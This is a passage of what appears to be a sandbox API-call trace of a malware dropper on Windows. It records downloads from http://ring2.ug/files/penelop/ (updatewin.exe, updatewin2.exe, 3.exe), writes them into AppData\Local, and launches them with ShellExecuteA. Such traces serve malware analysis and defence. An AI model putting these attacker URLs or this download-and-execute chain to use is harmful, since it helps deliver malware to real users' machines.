lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.202] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.203] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.203] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.204] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.235] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.235] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.236] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.236] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.240] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.240] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.242] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.243] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.244] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.244] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x1200) returned 1 [0079.245] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0079.245] CloseHandle (hObject=0x6b8) returned 1 [0079.249] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0079.255] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0079.255] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0079.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0079.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fa00 | out: hHeap=0x630000) returned 1 [0079.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.307] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332ec0 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x85e) returned 0x333bc58 [0079.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3332ec0, cbMultiByte=-1, lpWideCharStr=0x333bc58, cchWideChar=1071 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin.exe") returned 44 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0079.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332ec0 | out: hHeap=0x630000) returned 1 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82f) returned 0x9b79750 [0079.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x9b79750, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0079.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0079.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0079.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.308] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0079.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0079.503] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332ec0 [0079.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc58 [0079.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332ec0 | out: hHeap=0x630000) returned 1 [0079.503] lstrcpyA (in: lpString1=0x32cfd68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" [0079.503] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", pMore="updatewin.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe") returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0079.503] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b4 [0079.506] SetFilePointer (in: hFile=0x6b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.506] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.558] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.559] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.572] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.580] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.608] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.615] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.616] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.623] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.624] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.625] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.625] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.645] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.645] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.652] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.652] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.665] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.665] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.668] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.668] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.669] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.670] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.670] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.671] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.671] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.697] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.697] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.699] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.700] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.706] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.707] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.707] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.707] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.708] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.711] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.712] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.712] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.713] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.713] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.714] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.714] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.715] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.716] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.717] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0079.719] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0079.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x1e00) returned 1 [0079.721] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x1e00, lpOverlapped=0x0) returned 1 [0079.721] CloseHandle (hObject=0x6b4) returned 1 [0079.725] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0079.733] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0079.734] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0079.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0079.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc58 | out: hHeap=0x630000) returned 1 [0079.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0079.803] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0079.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332c58 [0079.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x84e) returned 0x333bc58 [0079.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3332c58, cbMultiByte=-1, lpWideCharStr=0x333bc58, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/3.exe") returned 36 [0079.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x32d0db8 [0079.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332c58 | out: hHeap=0x630000) returned 1 [0079.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x333bc58 [0079.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x827) returned 0x33515f0 [0079.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x33515f0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0079.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0079.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0079.804] HeapFree (in: 